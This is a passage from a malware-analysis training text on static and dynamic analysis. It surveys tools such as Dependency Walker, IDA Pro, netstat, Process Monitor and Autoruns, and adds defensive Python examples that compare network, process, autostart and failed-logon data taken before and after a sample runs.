Identifying File Dependencies
Any software program depends on various inbuilt libraries of an OS that help in performing specified actions in a system. Programs need to work with internal system files to function correctly. They store the import and export functions in a kernel32.dll file. File dependencies contain information about the internal system files that the program needs to function properly, the process of registration, and location on the machine.

You need to find the libraries and file dependencies, as they contain information about the run-time requirements of an application. Subsequently, you need to check if you can find and analyze these files, as they can provide information about malware in a file. File dependencies include linked libraries, functions, and function calls. Check the dynamically linked list in the malware executable file. Finding out all the library functions may allow you to guess what the

DLL | Description of contents
Kernel32.dll | Core functionality, such as access and manipulation of memory, files, and hardware
Advapi32.dll | Provides access to advanced core Windows components such as the Service Manager and Registry
User32.dll | User-interface components, such as buttons, scrollbars, and components for controlling and responding to user actions
Gdi32.dll | Functions for displaying and manipulating graphics
Ntdll.dll | Interface to the Windows kernel
WSock32.dll and Ws2_32.dll | Networking DLLs that help to connect to a network or perform network-related tasks
Wininet.dll | Supports higher-level networking functions
Use tools such as Dependency Walker to identify the dependencies within the executable file.

▪ Dependency Walker

Source: http://www.dependencywalker.com

Dependency Walker lists all the dependent modules of an executable file and builds hierarchical tree diagrams. It also records all the functions of each module's exports and calls. Furthermore, it detects many common application problems such as missing and invalid modules, import/export mismatches, circular dependency errors, mismatched machine modules, and module initialization failures.

Figure 7.73: Screenshot of Dependency Walker

Some additional dependency extraction tools are as follows:

▪ Dependency-check (https://jeremylong.github.io)
▪ Snyk (https://snyk.io)
▪ Hakiri (https://hakiri.io)
▪ Retire.js (https://retirejs.github.io)
Static Malware Analysis: Malware Disassembly

▪ Disassemble the binary code and analyze the assembly code instructions
▪ IDA Pro is a Windows, Linux, or Mac OS X hosted multi-platform disassembler and debugger
▪ Based on the reconstructed assembly code, inspect the program logic and recognize its threat potential; this process is performed using debugging tools such as OllyDbg (http://www.ollydbg.de)
Malware Disassembly

The static analysis also includes the dismantling of a given executable into binary format to study its functionalities and features. This process helps to identify the language used for programming the malware, APIs that reveal its function, etc. Based on the reconstructed assembly code, you can inspect the program logic and recognize its threat potential. This process can be performed using debugging tools such as IDA Pro and OllyDbg.

▪ IDA

Source: https://www.hex-rays.com

IDA Pro is a multi-platform disassembler and debugger that explores binary programs, for which the source code is not always available, to create maps of their execution. It shows the instructions in the same way as a processor executes them, i.e., in a symbolic representation called assembly language. Thus, it is easy for you to find harmful or malicious processes.

Features:

o Disassembler
  As a disassembler, IDA Pro explores binary programs, for which the source code is not always available, to create maps of their execution.
o Debugger
  The debugger in IDA Pro is an interactive tool that complements the disassembler to perform static analysis in one step. It bypasses the obfuscation process, which helps the assembler to process the hostile code in detail.

Figure 7.74: Screenshot of IDA Pro

Some additional debugging tools are as follows:

▪ Ghidra (https://ghidra-sre.org)
▪ Radare2 (https://rada.re)
▪ OllyDbg (http://www.ollydbg.de)
▪ WinDbg (http://www.windbg.org)
▪ ProcDump (https://docs.microsoft.com)
Dynamic Malware Analysis

▪ Dynamic analysis consists of two stages: system baselining and host integrity monitoring
▪ Host integrity monitoring includes port monitoring, process monitoring, registry monitoring, Windows services monitoring, startup programs monitoring, event logs monitoring/analysis, installation monitoring, files and folders monitoring, device drivers monitoring, network traffic monitoring/analysis, DNS monitoring/resolution, and API calls monitoring
Dynamic Malware Analysis

Dynamic malware analysis is the process of studying the behavior of malware by running it in a monitored environment. This type of analysis requires a safe environment, such as virtual machines and sandboxes, to deter the malware from spreading. The environment design should include tools that can capture every movement of the malware in detail and provide relevant feedback. Typically, virtual systems act as a base for conducting such experiments.

Host Integrity Monitoring

Host integrity monitoring is the process of studying the changes that have taken place across a system or machine after a series of actions or incidents. It involves taking snapshots of the system before and after the incident or action using the same tools and analyzing the changes to evaluate the impact on the system and its properties.

In malware analysis, host integrity monitoring helps to understand the runtime behavior of a malware file as well as its activities, propagation techniques, URLs accessed, downloads initiated, etc.

Host integrity monitoring includes the following:

▪ Port Monitoring
▪ Process Monitoring
▪ Registry Monitoring
▪ Windows Services Monitoring
▪ Startup Programs Monitoring
▪ Event Logs Monitoring/Analysis
▪ Installation Monitoring
▪ Files and Folders Monitoring
▪ Device Drivers Monitoring
▪ Network Traffic Monitoring/Analysis
▪ DNS Monitoring/Resolution
▪ API Calls Monitoring
Dynamic Malware Analysis: Port Monitoring

▪ Malware programs corrupt the system and open system input/output ports to establish connections with remote systems, networks, or servers to accomplish various malicious tasks
▪ Use port monitoring tools such as netstat and TCPView to scan for suspicious ports and look for any connection established to unknown or suspicious IP addresses
Port Monitoring

Malware programs corrupt the system and open system input/output ports to establish connections with remote systems, networks, or servers to accomplish various malicious tasks. These open ports can also form backdoors for other types of harmful malware and programs. Open ports act as communication channels for malware. They open unused ports on the victim's machine to connect back to the malware handlers. Scanning for suspicious ports will help in identifying such malware.

You can also determine whether malware is trying to access a particular port during dynamic analysis by installing port monitoring tools such as TCPView and Windows command-line utility tools such as netstat. These port monitoring tools provide details such as the protocol used, local address, remote address, and state of the connection. Additional features may include process name, process ID, remote connection protocol, etc.

▪ Netstat

It displays active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics (for the IP, ICMP, TCP, and UDP protocols), and IPv6 statistics (for the IPv6, ICMPv6, TCP over IPv6, and UDP over IPv6 protocols). When used without parameters, netstat displays only active TCP connections.

Syntax

netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]

Parameters

o -a: Displays all active TCP connections and the TCP and UDP ports on which the computer is listening.
o -e: Displays Ethernet statistics, such as the number of bytes and packets sent and received. This parameter can be combined with -s.
o -n: Displays active TCP connections; however, addresses and port numbers are expressed numerically, and no attempt is made to determine names.
o -o: Displays active TCP connections and includes the process ID (PID) for each connection. You can find the application based on the PID in the Processes tab in Windows Task Manager. This parameter can be combined with other parameters.
o -r: Displays the contents of the IP routing table. This is equivalent to the route print command.

Figure 7.75: Screenshot of Netstat
▪ TCPView

Source: https://docs.microsoft.com

TCPView is a Windows program that shows detailed listings of all TCP and UDP endpoints on the system, including the local and remote addresses and the state of the TCP connections. It provides a subset of the Netstat program that ships with Windows. The TCPView download includes Tcpvcon, a command-line version with the same functionality. When TCPView runs, it enumerates all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions.

Figure 7.76: Screenshot of TCPView

Some additional port monitoring tools are as follows:

▪ Port Monitor (https://www.port-monitor.com)
▪ CurrPorts (https://www.nirsoft.net)
▪ TCP Port Monitoring (https://www.dotcom-monitor.com)
▪ PortExpert (http://www.kcsoftwares.com)
▪ PRTG Network Monitor (https://www.paessler.com)
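The port-monitoring step, as an added example (not the courseware's or any listed tool's code): it parses the output of `netstat -ano` captured before and after the sample runs, the before/after snapshot approach the host integrity monitoring text describes, and reports new listeners, new established connections, and any connection whose remote address lies outside the lab's private ranges. Both netstat captures are constructed for the example; the process ID 3212 and the addresses in them are invented.

```python
import ipaddress

# Address ranges treated as "inside the lab"; anything else is reported as an external peer.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "0.0.0.0/8",
    "::1/128", "fc00::/7", "fe80::/10")]

# Constructed `netstat -ano` captures (not from a real host): baseline, then after the sample ran.
BASELINE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       904
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    10.0.0.5:49700         10.0.0.1:445           ESTABLISHED     4
  UDP    0.0.0.0:5355           *:*                                    1284
"""
AFTER_NETSTAT = BASELINE_NETSTAT + """\
  TCP    0.0.0.0:7777           0.0.0.0:0              LISTENING       3212
  TCP    10.0.0.5:49812         203.0.113.7:8443       ESTABLISHED     3212
  UDP    0.0.0.0:6000           *:*                                    3212
"""


def parse_netstat(text: str) -> set:
    """Parse `netstat -ano` output into (proto, local, remote, state, pid) tuples; UDP rows have no state."""
    rows = set()
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue  # banner, blank and column-header lines
        if parts[0] == "TCP" and len(parts) == 5:
            proto, local, remote, state, pid = parts
        elif parts[0] == "UDP" and len(parts) == 4:
            proto, local, remote, pid = parts
            state = ""
        else:
            continue
        rows.add((proto, local, remote, state, int(pid)))
    return rows


def split_endpoint(endpoint: str):
    """'203.0.113.7:8443' -> ('203.0.113.7', '8443'); IPv6 endpoints come as '[addr]:port'."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), port


def is_external(host: str) -> bool:
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # '*' or a hostname
    return not any(addr in net for net in INTERNAL_NETS)


def diff_snapshots(before: set, after: set) -> dict:
    """What the sample added: new listening sockets, new connections, and external peers."""
    report = {"new_listeners": [], "new_connections": [], "external": []}
    for proto, local, remote, state, pid in sorted(after - before):
        if state == "LISTENING" or (proto == "UDP" and remote == "*:*"):
            report["new_listeners"].append((proto, local, pid))
        elif state == "ESTABLISHED":
            report["new_connections"].append((proto, local, remote, pid))
            host, _ = split_endpoint(remote)
            if is_external(host):
                report["external"].append((remote, pid))
    return report


if __name__ == "__main__":
    result = diff_snapshots(parse_netstat(BASELINE_NETSTAT), parse_netstat(AFTER_NETSTAT))
    for key, rows in result.items():
        print(key)
        for row in rows:
            print("   ", row)
```

In practice, redirect `netstat -ano` to a file before detonation and again afterwards, then feed both files to `parse_netstat`; the PID in each new row is what you look up in Process Monitor or Task Manager next.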
Dynamic Malware Analysis: Process Monitoring

▪ Malware programs camouflage themselves as genuine Windows services and hide their processes; some malware use PEs (Portable Executables) to inject themselves into various processes (such as explorer.exe or web browsers)
▪ Process Monitor shows real-time file system, Registry, and process/thread activity
▪ Use process monitoring tools like Process Monitor to scan for suspicious processes
▪ Process monitoring tools: Process Explorer (https://docs.microsoft.com), OpManager (https://www.manageengine.com)
Process Monitoring

Malware enters the system through images, music files, videos, etc., which are downloaded from the Internet, camouflages itself as genuine Windows services, and hides its processes to avoid detection. Some malware use PEs to inject themselves into various processes (such as explorer.exe or web browsers). Malicious processes are visible but appear legitimate; hence, they can bypass desktop firewalls. Attackers use specific rootkit methods to hide malware in the system so that the antivirus software cannot detect it easily.

Process monitoring helps in understanding the processes that the malware initiates and takes over after execution. It is also necessary to observe the child processes, associated handles, loaded libraries, functions, and execution flow of boot time processes to define the entire nature of a file or program, gather information about the processes running before the execution of the malware, and compare them with the processes running after execution. This method will reduce the time taken to analyze the processes and help in easy identification of all the processes that the malware starts. Use process-monitoring tools such as Process Monitor to detect suspicious processes.

▪ Process Monitor

Source: https://docs.microsoft.com

Process Monitor is a monitoring tool for Windows that shows real-time file system, registry, and process/thread activity. It combines the features of two legacy Sysinternals utilities, Filemon and Regmon, and adds an extensive list of enhancements, including rich and non-destructive filtering, comprehensive event properties such as session IDs and user names, reliable process information, full thread stacks with integrated symbol support for each operation, simultaneous logging to a file, and so on. The unique features of Process Monitor make it a core utility in system troubleshooting and malware hunting toolkits.

Features:

o More data captured for operation input and output parameters.
o Non-destructive filters that can be set without losing data.
o Capture of thread stacks for each operation makes it possible to identify the cause of an operation in many cases.
o Reliable capture of process details, including image path, command line, user, and session ID.
o Configurable and moveable columns for any event property.
o Filters can be set for any data field, including fields not configured as columns.
o Advanced logging architecture scales to tens of millions of captured events and gigabytes of log data.
o Process tree tool shows the relationships of all processes referenced in a trace.
Figure 7.77: Screenshot of Process Monitor

Some additional process monitoring tools are as follows:

▪ Process Explorer (https://docs.microsoft.com)
▪ OpManager (https://www.manageengine.com)
▪ Monit (https://mmonit.com)
▪ ESET SysInspector (https://www.eset.com)
▪ System Explorer (http://systemexplorer.net)
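An added example for the process-monitoring step (not code from the courseware or from Process Monitor). It takes a process listing of the kind Process Explorer or Process Monitor's process tree gives you and applies three checks for the camouflage the text describes: a core Windows process name running from the wrong directory, a process name one character away from a core name, and a core process with the wrong parent. The process list is constructed for the example; the expected directories and parents are the normal Windows layout, written into the tables below.

```python
SYSTEM32 = r"c:\windows\system32"

# Where the core Windows processes legitimately live (lower-cased directory of the image path).
EXPECTED_DIR = {
    "svchost.exe": SYSTEM32, "lsass.exe": SYSTEM32, "csrss.exe": SYSTEM32, "services.exe": SYSTEM32,
    "winlogon.exe": SYSTEM32, "wininit.exe": SYSTEM32, "smss.exe": SYSTEM32, "explorer.exe": r"c:\windows",
}
# Parent each of these processes is normally started by.
EXPECTED_PARENT = {"svchost.exe": "services.exe", "lsass.exe": "wininit.exe", "services.exe": "wininit.exe"}

# Constructed process listing (pid, parent pid, name, image path); not from a real host.
PROCESSES = [
    {"pid": 4, "ppid": 0, "name": "System", "path": ""},
    {"pid": 520, "ppid": 4, "name": "wininit.exe", "path": r"C:\Windows\System32\wininit.exe"},
    {"pid": 600, "ppid": 520, "name": "services.exe", "path": r"C:\Windows\System32\services.exe"},
    {"pid": 620, "ppid": 520, "name": "lsass.exe", "path": r"C:\Windows\System32\lsass.exe"},
    {"pid": 804, "ppid": 600, "name": "svchost.exe", "path": r"C:\Windows\System32\svchost.exe"},
    {"pid": 2400, "ppid": 2100, "name": "explorer.exe", "path": r"C:\Windows\explorer.exe"},
    {"pid": 3212, "ppid": 2400, "name": "svchost.exe", "path": r"C:\Users\Public\svchost.exe"},
    {"pid": 3300, "ppid": 3212, "name": "lsas.exe", "path": r"C:\Users\Public\lsas.exe"},
]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch look-alike names such as a dropped or swapped letter."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def audit_processes(procs) -> list:
    """Return (pid, reason) for every process that fails the path, look-alike or parent check."""
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for p in procs:
        name = p["name"].lower()
        directory = p["path"].lower().rsplit("\\", 1)[0]
        if name in EXPECTED_DIR:
            if directory != EXPECTED_DIR[name]:
                findings.append((p["pid"], f"{p['name']} running from {p['path']}"))
        else:
            for known in EXPECTED_DIR:
                if edit_distance(name, known) == 1:
                    findings.append((p["pid"], f"{p['name']} looks like {known}"))
        parent = by_pid.get(p["ppid"])
        if name in EXPECTED_PARENT and parent and parent["name"].lower() != EXPECTED_PARENT[name]:
            findings.append((p["pid"], f"{p['name']} started by {parent['name']} (expected {EXPECTED_PARENT[name]})"))
    return findings


if __name__ == "__main__":
    for pid, reason in audit_processes(PROCESSES):
        print(f"PID {pid}: {reason}")
```

The same checks are what you apply by eye in Process Explorer's tree view; encoding them lets you compare the pre-execution and post-execution listings the text asks for without re-reading every row.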
Dynamic Malware Analysis: Registry Monitoring

▪ The malware uses the registry to perform harmful activity continuously by storing entries in the registry and ensuring that the malicious program runs automatically whenever the computer or device boots
▪ Registry monitoring tools: Reg Organizer (https://www.chemtable.com)
Registry Monitoring

The Windows registry stores OS and program configuration details, such as settings and options. If the malware is a program, the registry stores its functionality. The malware uses the registry to perform harmful activity continuously by storing entries in the registry and ensuring that the malicious program runs automatically whenever the computer or device boots. When an attacker installs malware on the victim's machine, it generates a registry entry. Consequently, various changes will be noticed, such as the system becoming slower, various advertisements popping up, and so on.

Windows automatically executes instructions in the following sections of the registry:

▪ Run
▪ RunServices
▪ RunOnce
▪ RunServicesOnce
▪ HKEY_CLASSES_ROOT\exefile\shell\open\command "%1" %*

Malware inserts instructions in these sections of the registry to perform malicious activities. You should have fair knowledge of the Windows registry, its contents, and inner workings to analyze the presence of malware. Scanning for suspicious registry entries will help to detect malware. Use registry monitoring tools such as RegScanner to scan registry values for any suspicious entries that may indicate malware infection.

▪ jv16 PowerTools

Source: https://www.macecraft.com

jv16 PowerTools is a PC system utility software that works by cleaning the Windows registry, erasing unnecessary files and data, automatically fixing system errors, and optimizing your system. It allows you to scan and monitor the registry. It helps in detecting registry entries created by the malware. The "Clean And SpeedUp My Computer" feature of Registry Cleaner in jv16 PowerTools is a solution for fixing registry errors and system errors and cleaning registry leftovers and unnecessary files such as old log files and temporary files.

Figure 7.78: Screenshot of jv16 PowerTools

Some additional registry monitoring tools are as follows:

▪ regshot (https://sourceforge.net)
▪ Reg Organizer (https://www.chemtable.com)
▪ Registry Viewer (https://accessdata.com)
▪ RegScanner (https://www.nirsoft.net)
▪ Registrar Registry Manager (https://www.resplendence.com)
Dynamic Malware Analysis: Windows Services Monitoring

▪ Malware may employ rootkit techniques to manipulate the HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services registry key to hide its processes and services
▪ Use Windows services monitoring tools such as Windows Service Manager (SrvMan) to trace malicious services
▪ Windows services monitoring tools: Advanced Windows Service Manager (https://securityxploded.com), Netwrix Service Monitor (https://www.netwrix.com), AnVir Task Manager (https://www.anvir.com), Services (https://www.activeplus.com)
Windows Services Monitoring

Attackers design malware and other malicious code such that they install and run on a computer in the form of services. As most services run in the background to support processes and applications, the malicious services are invisible even when they are performing harmful activities in the system, and they can function without intervention or input. Malware spawns Windows services that allow attackers to remotely control the victim's machine and pass malicious instructions. Malware may also adopt rootkit techniques to manipulate the following registry key to hide their processes and services.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services

These malicious services run as the SYSTEM account or other privileged accounts, which provide greater access compared to user accounts, making them more dangerous than common malware and executable code. Attackers also try to conceal their actions by naming the malicious services with names similar to genuine Windows services to avoid detection.

You can trace malicious services initiated by the suspicious file during dynamic analysis using Windows service monitoring tools such as Windows Service Manager (SrvMan), which can detect changes in services and scan for suspicious Windows services.

▪ Windows Service Manager (SrvMan)

Source: http://tools.sysprogs.org

SrvMan has both GUI and command-line modes. It can also be used to run arbitrary Win32 applications as services (when such a service is stopped, the main application window is automatically closed).

You can use SrvMan's command-line interface to perform the following tasks:

o Create services
  srvman.exe add <file.exe/file.sys> [service name] [display name] [/type:<service type>] [/start:<start mode>] [/interactive:no] [/overwrite:yes]
o Delete services
  srvman.exe delete <service name>
o Start/stop/restart services
  srvman.exe start <service name> [/nowait] [/delay:<delay in msec>]
  srvman.exe stop <service name> [/nowait] [/delay:<delay in msec>]
  srvman.exe restart <service name> [/delay:<delay in msec>]
o Install and start a legacy driver with a single call
  srvman.exe run <driver.sys> [service name] [/copy:yes] [/overwrite:no] [/stopafter:<msec>]

Figure 7.79: Screenshot of Windows Service Manager

Some additional Windows service monitoring tools are as follows:

▪ Advanced Windows Service Manager (https://securityxploded.com)
▪ Process Hacker (https://processhacker.sourceforge.io)
▪ Netwrix Service Monitor (https://www.netwrix.com)
▪ AnVir Task Manager (https://www.anvir.com)
▪ Services (https://www.activeplus.com)
Dynamic Malware Analysis: Startup Programs Monitoring

▪ Check the Windows services that are automatically started: go to Run, type services.msc, and sort by Startup Type
▪ Check the Startup folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
Startup Programs Monitoring

Malware can alter the system settings and add themselves to the startup menu to perform malicious activities whenever the system starts. Therefore, scanning for suspicious startup programs manually or using startup program monitoring tools such as Autoruns for Windows is essential for detecting malware.

Steps to manually detect hidden malware:

▪ Step 1: Check startup program entries in the registry

Startup items such as programs, shortcuts, folders, and drivers are set to run automatically at startup when users log in to a Windows OS (e.g., Windows 10). Startup items can be added by the programs or drivers installed, or manually by the user. Programs that run on Windows 10 startup can be located in these registry entries, such as Windows startup setting, Explorer startup setting, and IE startup setting.

o Windows Startup Setting
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\…
  HKEY_CURRENT_USER\Software\Microsoft\Windows\…
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\…
  HKEY_CURRENT_USER\Software\Microsoft\Windows\…
o Explorer Startup Setting
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, Common Startup
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Common Startup
  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, Startup
  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Startup
o IE Startup Setting
  HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions
  HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\MenuExt
Step 2: Check device drivers automatically loaded

Navigate to C:\Windows\system32\drivers to check the device drivers.

Figure 7.80: Screenshot displaying drivers folder

Step 3: Check boot.ini or bcd (bootmgr) entries

Check boot.ini or bcd (bootmgr) entries using the command prompt. Open command prompt with administrative privileges, type bcdedit, and press Enter to view all the boot manager entries.

Figure 7.81: Screenshot displaying boot info

Step 4: Check Windows services that start automatically

Go to Run > Type services.msc and press Enter. Sort the services by Startup Type to check the Windows services list for services that automatically start when the system boots.

Figure 7.82: Screenshot displaying services

Step 5: Check the Startup folder

The Startup folders store applications or shortcuts to applications that auto-start when the system boots. To check the Startup applications, search the following locations in Windows 10:
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
- C:\Users\(User-Name)\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Another method to access startup folders is as follows:
1. Press Windows + R simultaneously to open the Run box.
2. Type shell:startup in the Run box and click OK to navigate to the startup folder.

Figure 7.83: Screenshot showing shell:startup command in the Run box

Figure 7.84: Screenshot of Autoruns for Windows

Some additional startup programs monitoring tools are as follows:
- WinPatrol (http://www.winpatrol.com)
- Autorun Organizer (https://www.chemtable.com)
- Quick Startup (https://www.glarysoft.com)
- StartEd Pro (http://www.outertech.com)
- Chameleon Startup Manager (http://www.chameleon-managers.com)
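The manual checks in Steps 1-5 are usually automated as a baseline comparison: snapshot the autostart locations on the clean image, run the sample, snapshot again, and look at what changed. The following is an added example (not code from the book or from any tool listed above); the two snapshots, the lab user name and the environment-variable expansions are constructed assumptions.

```python
"""Baseline comparison of Windows autostart locations.

Added example for Steps 1-5 above; it is not code from the book or from any
tool listed there. The two snapshots below are constructed by hand, in the
shape an export of the Run keys, the services set to Automatic and the
Startup folders would give (location\\name -> command line)."""
from typing import Dict, List, Tuple

Snapshot = Dict[str, str]

# Folders that need no admin rights to write to; a benign installer rarely
# puts an autostart image there, while malware (e.g. the Emotet sample later
# in this module, %LocalAppData%\culturesource\culturesource.exe) often does.
USER_WRITABLE_MARKERS = (
    "\\appdata\\local\\",
    "\\appdata\\roaming\\",
    "\\temp\\",
    "\\users\\public\\",
)

# Constructed baseline taken on the clean lab image.
BASELINE: Snapshot = {
    "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SecurityHealth":
        "%windir%\\system32\\SecurityHealthSystray.exe",
    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive":
        '"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background',
    "Services\\Automatic\\Spooler": "C:\\Windows\\System32\\spoolsv.exe",
}

# Constructed snapshot taken after running the suspicious sample.
CURRENT: Snapshot = dict(BASELINE)
CURRENT["HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\culturesource"] = \
    "%LocalAppData%\\culturesource\\culturesource.exe"
CURRENT["Startup\\user\\update.lnk"] = "C:\\Users\\user\\AppData\\Local\\Temp\\update.exe"
CURRENT["Services\\Automatic\\Spooler"] = '"C:\\Windows\\System32\\spoolsv.exe"'  # same image, quoted


def normalize(cmd: str) -> str:
    """Lower-case, expand common env vars and strip quotes so the same image
    written two ways compares equal (the lab user is assumed to be 'user')."""
    p = cmd.strip().strip('"').lower()
    for var, value in (("%localappdata%", "c:\\users\\user\\appdata\\local"),
                       ("%appdata%", "c:\\users\\user\\appdata\\roaming"),
                       ("%temp%", "c:\\users\\user\\appdata\\local\\temp"),
                       ("%windir%", "c:\\windows")):
        p = p.replace(var, value)
    return p


def in_user_writable_dir(cmd: str) -> bool:
    p = normalize(cmd)
    return any(marker in p for marker in USER_WRITABLE_MARKERS)


def diff_autoruns(baseline: Snapshot, current: Snapshot) -> Dict[str, List[Tuple[str, str]]]:
    """Added, removed and changed entries between two snapshots."""
    added = [(k, v) for k, v in current.items() if k not in baseline]
    removed = [(k, v) for k, v in baseline.items() if k not in current]
    changed = [(k, v) for k, v in current.items()
               if k in baseline and normalize(baseline[k]) != normalize(v)]
    return {"added": added, "removed": removed, "changed": changed}


def suspicious_entries(report: Dict[str, List[Tuple[str, str]]]) -> List[str]:
    """New or changed entries whose image lives in a user-writable folder.
    Entries already in the baseline (OneDrive above) are not re-flagged."""
    return [key for kind in ("added", "changed") for key, cmd in report[kind]
            if in_user_writable_dir(cmd)]


if __name__ == "__main__":
    rep = diff_autoruns(BASELINE, CURRENT)
    for kind in ("added", "removed", "changed"):
        for key, cmd in rep[kind]:
            print(f"{kind:8} {key} -> {cmd}")
    print("suspicious:", suspicious_entries(rep))
```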
Malware Analysis: Dynamic Event Logs Monitoring/Analysis

Event Logs Monitoring/Analysis

Log analysis is a process that provides the details of an activity or event, from which information can be extracted that helps in identifying possible attacks in the form of Trojans, worms, backdoor Trojans, or any possible security gaps. This process helps in detecting attacks (failed authentication/login attempts) in the system. It serves as a primary source for detecting zero-day attacks when logs are analyzed for different components. Log monitoring can be performed for components that perform security operations, such as firewall systems, IDS/IPS, web servers, and authentication servers. The logs also contain file types, ports, timestamps, and registry entries. In Windows, system logs, application logs, access logs, audit logs, and security logs can be analyzed in Event Viewer under the section "Windows Logs."

Logs are located via the following paths:
- System logs: Start > Windows Administrative Tools > Event Viewer > Windows Logs > System
- Security logs: Start > Windows Administrative Tools > Event Viewer > Windows Logs > Security
- Applications and Services Logs: Start > Windows Administrative Tools > Event Viewer > Applications and Services Logs

Log Analysis Tools:

Splunk
Source: https://www.splunk.com
It is an SIEM tool that can automatically collect all the event logs from all the systems present in the network. Splunk forwarders need to be installed in all the systems in the network that need to be monitored, and these forwarders will transfer the real-time event logs from the network systems to the main Splunk dashboard.

Figure 7.85: Screenshot of Splunk

Some additional log monitoring/analysis tools are as follows:
- ManageEngine EventLog Analyzer (https://www.manageengine.com)
- Logaly (https://www.logaly.com)
- SolarWinds Log & Event Manager (https://www.solarwinds.com)
- Netwrix Event Log Manager (https://www.netwrix.com)
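The failed authentication/login attempts mentioned above are the most common thing a log analyst actually looks for in the Security log. The following added example (not code from the book, Splunk, or any tool listed) runs a sliding-window check over constructed Event ID 4625 records; the timestamps, accounts and addresses are made up.

```python
"""Detect failed-logon bursts (brute force and password spraying) in Windows
Security log events.

Added example for the log analysis described above, not code from Splunk or
any tool listed there. The records are constructed inline with the fields of
Event ID 4625 ("An account failed to log on") that matter for this check;
LogonType 10 is RemoteInteractive (RDP)."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

FAILED_LOGON = 4625

# Constructed sample: a user mistypes a password twice, then one external
# address tries six different accounts over RDP within ten seconds.
EVENTS: List[Dict] = [
    {"time": "2020-03-21 09:00:01", "id": 4625, "user": "alice", "ip": "10.0.0.5", "logon_type": 2},
    {"time": "2020-03-21 09:00:09", "id": 4625, "user": "alice", "ip": "10.0.0.5", "logon_type": 2},
    {"time": "2020-03-21 09:00:15", "id": 4624, "user": "alice", "ip": "10.0.0.5", "logon_type": 2},
    {"time": "2020-03-21 09:10:00", "id": 4625, "user": "administrator", "ip": "203.0.113.7", "logon_type": 10},
    {"time": "2020-03-21 09:10:02", "id": 4625, "user": "admin", "ip": "203.0.113.7", "logon_type": 10},
    {"time": "2020-03-21 09:10:04", "id": 4625, "user": "backup", "ip": "203.0.113.7", "logon_type": 10},
    {"time": "2020-03-21 09:10:06", "id": 4625, "user": "svc_sql", "ip": "203.0.113.7", "logon_type": 10},
    {"time": "2020-03-21 09:10:08", "id": 4625, "user": "guest", "ip": "203.0.113.7", "logon_type": 10},
    {"time": "2020-03-21 09:10:10", "id": 4625, "user": "jsmith", "ip": "203.0.113.7", "logon_type": 10},
]


def parse_time(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def find_failed_logon_bursts(events, threshold=5, window=timedelta(minutes=5)):
    """Sliding window per source address: report the first window in which a
    source produced at least `threshold` failed logons. Many distinct target
    accounts from one source is the password-spray shape; the same account
    repeated is classic brute force."""
    failures = defaultdict(list)
    for event in events:
        if event["id"] == FAILED_LOGON:
            failures[event["ip"]].append(event)

    findings = []
    for ip, evs in failures.items():
        evs.sort(key=lambda e: parse_time(e["time"]))
        start = 0
        for end in range(len(evs)):
            while parse_time(evs[end]["time"]) - parse_time(evs[start]["time"]) > window:
                start += 1
            if end - start + 1 >= threshold:
                burst = evs[start:end + 1]
                findings.append({
                    "ip": ip,
                    "count": len(burst),
                    "users": sorted({e["user"] for e in burst}),
                    "rdp": any(e["logon_type"] == 10 for e in burst),
                    "first": burst[0]["time"],
                    "last": burst[-1]["time"],
                })
                break   # one finding per source is enough for triage
    return findings


if __name__ == "__main__":
    for f in find_failed_logon_bursts(EVENTS):
        kind = "password spray" if len(f["users"]) > 1 else "brute force"
        print(f"{f['ip']}: {f['count']} failures ({kind}, rdp={f['rdp']}) "
              f"between {f['first']} and {f['last']} -> {', '.join(f['users'])}")
```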
Malware Analysis: Dynamic Installation Monitoring

Installation Monitoring

When the system or user installs or uninstalls any software application, traces of the application data might remain on the system. To find these traces, you should know the folders modified or created during the installation process as well as the files and folders that have not been modified by the uninstall process. Installation monitoring helps in detecting hidden and background installations performed by malware. Tools such as SysAnalyzer can be used to monitor the installation of malicious executables.

Mirekusoft Install Monitor
Source: https://www.mirekusoft.com
